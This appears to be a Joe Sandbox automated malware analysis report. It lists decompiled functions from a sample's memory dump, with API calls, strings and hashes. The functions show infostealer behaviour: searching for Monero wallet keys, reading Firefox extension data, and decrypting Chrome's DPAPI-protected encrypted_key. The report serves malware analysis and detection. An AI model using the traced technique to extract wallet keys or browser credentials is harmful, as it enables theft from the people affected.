Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: d17b213ffc71d4b14ea93e7f9db3aba7f5128364e830ea41465fbf4b6dfbff7d
Instruction ID: 92108839f9e3a2ff24547fd2fcbdd3a38a12310d7a8526375eb07e197633efa0
Opcode Fuzzy Hash: d17b213ffc71d4b14ea93e7f9db3aba7f5128364e830ea41465fbf4b6dfbff7d
Instruction Fuzzy Hash: DE113AB2A44209ABE700DFD4DD49FABBBB8FB44B10F10415AFA16E7680D77459019BA1

Function 008912A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 008912B4
RtlAllocateHeap.NTDLL(00000000), ref: 008912BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 008912D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008912F5
RegCloseKey.ADVAPI32(?), ref: 008912FF

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 053dc5fa6499b74fbfb3b8a62e232a0ce3edb2155c53c498cc03cbbb0d83e7e4
Instruction ID: d3eee7db4887537cacde732e9ce06d832d88ef4be67d9cce4af24dee7545e2d8
Opcode Fuzzy Hash: 053dc5fa6499b74fbfb3b8a62e232a0ce3edb2155c53c498cc03cbbb0d83e7e4
Instruction Fuzzy Hash: 2501CDB9A40208BBDB04DFE4DC49FAEB7B8EB58701F10815AFA06D7280D6759A019B51

Function 0089A0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(01429108,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 0089A0BD
LoadLibraryA.KERNEL32(0142DB60), ref: 0089A146

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA820: lstrlen.KERNEL32(00894F05,?,?,00894F05,008B0DDE), ref: 008AA82B
Part of subcall function 008AA820: lstrcpy.KERNEL32(008B0DDE,00000000), ref: 008AA885

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

SetEnvironmentVariableA.KERNEL32(01429108,00000000,00000000,?,008B12D8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,008B0AFE), ref: 0089A132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0089A0B2, 0089A0C6, 0089A0DC

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: 3bdd10075072ed24283e0f4bbf2e2c6b73aa619bc15082df259ac97fd940d0bf
Instruction ID: 69da9c55a51e0af52cd44df90d965b4f731c38a6c6e5a33d32f2b383683e3a01
Opcode Fuzzy Hash: 3bdd10075072ed24283e0f4bbf2e2c6b73aa619bc15082df259ac97fd940d0bf
Instruction Fuzzy Hash: 404133B5912104DFDB08EFE8EC85AAA77B4F725301F18412AF507D36A0DB349A46CB63

Function 0089A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008A8B60: GetSystemTime.KERNEL32(008B0E1A,0142A240,008B05AE,?,?,008913F9,?,0000001A,008B0E1A,00000000,?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008A8B86

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0089A2E1
lstrlen.KERNEL32(00000000,00000000), ref: 0089A3FF
lstrlen.KERNEL32(00000000), ref: 0089A6BC

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

DeleteFileA.KERNEL32(00000000), ref: 0089A743

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 015107208b5facf00f762a8537cba0e7038db8554e12f08922043a71dd7579fb
Instruction ID: 8a273d6ad57259c1cc5ffd9b9697dfc0da7df53b39f3c9922dbec818c90fd5b1
Opcode Fuzzy Hash: 015107208b5facf00f762a8537cba0e7038db8554e12f08922043a71dd7579fb
Instruction Fuzzy Hash: 30E1D2728101189AEB48EBA8DC95EEE7338FF15300F548169F517F6891EF346A49CB63

Function 0089D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008A8B60: GetSystemTime.KERNEL32(008B0E1A,0142A240,008B05AE,?,?,008913F9,?,0000001A,008B0E1A,00000000,?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008A8B86

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0089D801
lstrlen.KERNEL32(00000000), ref: 0089D99F
lstrlen.KERNEL32(00000000), ref: 0089D9B3
DeleteFileA.KERNEL32(00000000), ref: 0089DA32

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: d43d4afbd3b2f1fe874c8b897646dd94007cff2b921ad0f9174a680230de5f78
Instruction ID: 7d44bc6462baa41e0157a5616e400f436f84cdc960491317bd3f47b65044638a
Opcode Fuzzy Hash: d43d4afbd3b2f1fe874c8b897646dd94007cff2b921ad0f9174a680230de5f78
Instruction Fuzzy Hash: 3681FE719101149AEB48FBA8DC96EEE7338FF15300F444129F417E6991EF386A09CB63

Function 0089F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Part of subcall function 008999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008999EC
Part of subcall function 008999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00899A11
Part of subcall function 008999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00899A31
Part of subcall function 008999C0: ReadFile.KERNEL32(000000FF,?,00000000,0089148F,00000000), ref: 00899A5A
Part of subcall function 008999C0: LocalFree.KERNEL32(0089148F), ref: 00899A90
Part of subcall function 008999C0: CloseHandle.KERNEL32(000000FF), ref: 00899A9A

Part of subcall function 008A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008A8E52

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,008B1580,008B0D92), ref: 0089F54C
lstrlen.KERNEL32(00000000), ref: 0089F56B

Strings

moz-extension+++, xrefs: 0089F5AD
^userContextId=4294967295, xrefs: 0089F59C

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: dc27780b570c9db85aef0068090c07d192bf6e9c406b48b95925abe95f0b1603
Instruction ID: 6c69dd1b583d19e782f3b18ef1408d3b97df4d76ad9ba2ac5643c693d5b81778
Opcode Fuzzy Hash: dc27780b570c9db85aef0068090c07d192bf6e9c406b48b95925abe95f0b1603
Instruction Fuzzy Hash: 0051F1719101089AEB48FBA8DC96DEE7778FF55300F448528F417D6991EF386609CBA3

Function 00899CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008999EC
Part of subcall function 008999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00899A11
Part of subcall function 008999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00899A31
Part of subcall function 008999C0: ReadFile.KERNEL32(000000FF,?,00000000,0089148F,00000000), ref: 00899A5A
Part of subcall function 008999C0: LocalFree.KERNEL32(0089148F), ref: 00899A90
Part of subcall function 008999C0: CloseHandle.KERNEL32(000000FF), ref: 00899A9A

Part of subcall function 008A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008A8E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00899D39

Part of subcall function 00899AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00894EEE,00000000,00000000), ref: 00899AEF
Part of subcall function 00899AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00894EEE,00000000,?), ref: 00899B01
Part of subcall function 00899AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00894EEE,00000000,00000000), ref: 00899B2A
Part of subcall function 00899AC0: LocalFree.KERNEL32(?,?,?,?,00894EEE,00000000,?), ref: 00899B3F

Part of subcall function 00899B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00899B84
Part of subcall function 00899B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00899BA3
Part of subcall function 00899B60: LocalFree.KERNEL32(?), ref: 00899BD3

Strings

"encrypted_key":", xrefs: 00899D30
DPAPI, xrefs: 00899D89
, xrefs: 00899DC1

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
